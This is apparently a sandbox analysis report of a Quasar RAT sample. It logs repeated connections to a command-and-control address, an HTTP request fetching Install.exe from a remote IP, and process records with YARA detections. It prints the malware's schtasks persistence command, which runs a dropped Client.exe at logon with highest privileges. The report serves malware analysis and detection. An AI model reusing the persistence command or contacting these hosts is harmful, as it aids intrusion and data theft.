                                        Jan 1, 2025 06:00:34.975123882 CET501974004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:34.979954958 CET400450197193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:35.602812052 CET400450197193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:35.603554010 CET501974004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:35.608333111 CET400450197193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:36.351959944 CET501994004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:36.351959944 CET501974004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:36.356806040 CET400450199193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:36.356966019 CET501994004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:36.357002974 CET400450197193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:36.357172966 CET501994004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:36.357172966 CET501974004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:36.361964941 CET400450199193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:36.975732088 CET400450199193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:36.979991913 CET501994004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:36.984823942 CET400450199193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:37.738218069 CET501994004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:37.738745928 CET502014004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:37.743243933 CET400450199193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:37.743295908 CET501994004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:37.743592978 CET400450201193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:37.743655920 CET502014004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:37.743870020 CET502014004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:37.748672009 CET400450201193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:38.389394045 CET400450201193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:38.392220974 CET502014004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:38.397093058 CET400450201193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:39.113192081 CET502014004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:39.113944054 CET502034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:39.118139029 CET400450201193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:39.118181944 CET502014004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:39.118716955 CET400450203193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:39.118777990 CET502034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:39.129065990 CET502034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:39.133804083 CET400450203193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:39.730947018 CET400450203193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:39.731780052 CET502034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:39.736591101 CET400450203193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:40.813205957 CET502034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:40.813966990 CET502054004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:40.818240881 CET400450203193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:40.818358898 CET502034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:40.818777084 CET400450205193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:40.818866968 CET502054004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:40.819084883 CET502054004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:40.823851109 CET400450205193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:41.467792034 CET400450205193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:41.468581915 CET502054004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:41.474605083 CET400450205193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:42.388093948 CET502054004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:42.388525963 CET502074004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:42.393228054 CET400450205193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:42.393300056 CET400450207193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:42.393331051 CET502054004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:42.393420935 CET502074004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:42.393976927 CET502074004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:42.398703098 CET400450207193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:43.021279097 CET400450207193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:43.022069931 CET502074004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:43.029766083 CET400450207193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:43.901904106 CET502074004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:43.902271986 CET502094004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:43.906995058 CET400450207193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:43.907090902 CET400450209193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:43.907105923 CET502074004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:43.907150030 CET502094004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:43.907306910 CET502094004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:43.912074089 CET400450209193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:44.545141935 CET400450209193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:44.545977116 CET502094004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:44.550764084 CET400450209193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:45.420917034 CET502094004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:45.421370983 CET502114004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:45.426090956 CET400450209193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:45.426140070 CET502094004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:45.426158905 CET400450211193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:45.426220894 CET502114004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:45.426434994 CET502114004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:45.431250095 CET400450211193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:46.059307098 CET400450211193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:46.059834003 CET502114004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:46.064686060 CET400450211193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:47.046212912 CET502114004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:47.046583891 CET502134004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:47.051330090 CET400450211193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:47.051398993 CET400450213193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:47.051541090 CET502134004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:47.051544905 CET502114004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:47.051769972 CET502134004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:47.056505919 CET400450213193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:47.712608099 CET400450213193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:47.713699102 CET502134004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:47.718528986 CET400450213193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:48.652993917 CET502134004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:48.653163910 CET502154004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:48.657962084 CET400450215193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:48.658063889 CET400450213193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:48.658169985 CET502134004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:48.658215046 CET502154004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:48.661988020 CET502154004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:48.666801929 CET400450215193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:49.289153099 CET400450215193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:49.289949894 CET502154004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:49.294768095 CET400450215193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:50.305171967 CET502154004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:50.305577993 CET502174004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:50.310317993 CET400450215193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:50.310389042 CET400450217193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:50.310448885 CET502154004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:50.310537100 CET502174004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:50.310760021 CET502174004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:50.315552950 CET400450217193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:50.930394888 CET400450217193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:50.942006111 CET502174004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:50.946907043 CET400450217193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:51.842931032 CET502174004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:51.843417883 CET502194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:51.847982883 CET400450217193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:51.848025084 CET502174004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:51.848249912 CET400450219193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:51.848298073 CET502194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:51.848598003 CET502194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:51.853343010 CET400450219193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:52.467792988 CET400450219193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:52.470004082 CET502194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:52.474875927 CET400450219193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:53.377620935 CET502194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:53.378195047 CET502214004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:53.382775068 CET400450219193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:53.382826090 CET502194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:53.382965088 CET400450221193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:53.383017063 CET502214004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:53.383233070 CET502214004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:53.387999058 CET400450221193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:54.011827946 CET400450221193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:54.012610912 CET502214004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:54.017364025 CET400450221193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:55.002511024 CET502214004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:55.002511024 CET502234004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:55.007977009 CET400450223193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:55.007987976 CET400450221193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:55.009078979 CET502214004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:55.009078979 CET502234004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:55.009332895 CET502234004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:55.014111042 CET400450223193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:55.638022900 CET400450223193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:55.638838053 CET502234004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:55.644185066 CET400450223193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:56.655569077 CET502254004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:56.655586004 CET502234004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:56.660408974 CET400450225193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:56.660552025 CET502254004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:56.660761118 CET502254004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:56.660835028 CET400450223193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:56.662082911 CET502234004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:56.665494919 CET400450225193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:57.280466080 CET400450225193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:57.280981064 CET502254004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:57.285742044 CET400450225193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:58.248878002 CET502254004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:58.249299049 CET502274004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:58.253983974 CET400450225193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:58.254085064 CET400450227193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:58.254198074 CET502254004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:58.254198074 CET502274004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:58.254401922 CET502274004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:58.259141922 CET400450227193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:58.871736050 CET400450227193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:58.872560024 CET502274004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:58.877321005 CET400450227193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:59.889481068 CET502274004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:59.890604019 CET502294004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:59.894599915 CET400450227193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:59.894644976 CET502274004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:59.895425081 CET400450229193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:00:59.895479918 CET502294004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:59.895926952 CET502294004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:00:59.900943995 CET400450229193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:00.525264978 CET400450229193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:00.529036045 CET502294004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:00.534097910 CET400450229193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:01.329806089 CET502294004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:01.330159903 CET502314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:01.335355997 CET400450229193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:01.335369110 CET400450231193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:01.335414886 CET502294004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:01.335447073 CET502314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:01.335736036 CET502314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:01.342298985 CET400450231193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:01.983504057 CET400450231193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:01.984836102 CET502314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:01.991317987 CET400450231193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:03.234977007 CET502314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:03.235563040 CET502334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:03.243889093 CET400450233193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:03.243947983 CET502334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:03.244148016 CET502334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:03.244163036 CET400450231193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:03.244223118 CET502314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:03.248907089 CET400450233193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:03.863707066 CET400450233193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:03.864373922 CET502334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:03.870086908 CET400450233193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:05.489481926 CET502334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:05.495481968 CET400450233193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:05.495533943 CET502334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:05.497050047 CET502354004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:05.503463984 CET400450235193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:05.503526926 CET502354004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:05.504014015 CET502354004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:05.509207964 CET400450235193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:06.119986057 CET400450235193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:06.124046087 CET502354004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:06.128828049 CET400450235193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:06.909198046 CET502354004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:06.910024881 CET502374004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:06.914203882 CET400450235193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:06.914820910 CET400450237193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:06.914908886 CET502354004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:06.914911032 CET502374004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:06.915427923 CET502374004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:06.920185089 CET400450237193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:07.533744097 CET400450237193.31.28.181192.168.2.4
                                        Jan 1, 2025 06:01:07.534476995 CET502374004192.168.2.4193.31.28.181
                                        Jan 1, 2025 06:01:07.539261103 CET400450237193.31.28.181192.168.2.4
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 1, 2025 05:57:22.634469032 CET1.1.1.1192.168.2.40xc499No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:57:22.634469032 CET1.1.1.1192.168.2.40xc499No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:58:44.570470095 CET1.1.1.1192.168.2.40xcbe9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:58:44.570470095 CET1.1.1.1192.168.2.40xcbe9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:59:04.271455050 CET1.1.1.1192.168.2.40x198cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:59:04.271455050 CET1.1.1.1192.168.2.40x198cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:59:38.061583042 CET1.1.1.1192.168.2.40x39e2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:59:38.061583042 CET1.1.1.1192.168.2.40x39e2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:59:57.634542942 CET1.1.1.1192.168.2.40x7bbNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 05:59:57.634542942 CET1.1.1.1192.168.2.40x7bbNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:22.937120914 CET1.1.1.1192.168.2.40x5820No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:22.937120914 CET1.1.1.1192.168.2.40x5820No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:39.795881987 CET1.1.1.1192.168.2.40xc227No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:58.929327011 CET1.1.1.1192.168.2.40xd950No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Jan 1, 2025 06:00:58.929327011 CET1.1.1.1192.168.2.40xd950No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        • 45.83.244.141
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.44973045.83.244.141807324C:\Users\user\Desktop\Dd5DwDCHJD.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 1, 2025 05:57:04.067773104 CET80OUTGET /Files/Install.exe HTTP/1.1
                                        Host: 45.83.244.141
                                        Connection: Keep-Alive
                                        Jan 1, 2025 05:57:04.685983896 CET540INHTTP/1.1 404 Not Found
                                        Date: Wed, 01 Jan 2025 04:57:04 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Content-Length: 299
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 38 33 2e 32 34 34 2e 31 34 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 45.83.244.141 Port 80</address></body></html>


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:23:57:01
                                        Start date:31/12/2024
                                        Path:C:\Users\user\Desktop\Dd5DwDCHJD.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\Dd5DwDCHJD.exe"
                                        Imagebase:0xcb0000
                                        File size:3'268'096 bytes
                                        MD5 hash:6D6C9C719E2F757442374AF378C343A7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1741000374.000000001BE36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000000.1662187645.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:23:57:02
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:"schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f
                                        Imagebase:0x7ff76f990000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:23:57:02
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:23:57:04
                                        Start date:31/12/2024
                                        Path:C:\Users\user\AppData\Roaming\$77-cmd\Client.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\$77-cmd\Client.exe
                                        Imagebase:0xe20000
                                        File size:3'268'096 bytes
                                        MD5 hash:6D6C9C719E2F757442374AF378C343A7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: Joe Security
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: Joe Security
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: Florian Roth
                                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: ditekSHen
                                        • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, Author: ditekshen
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 74%, ReversingLabs
                                        Reputation:low
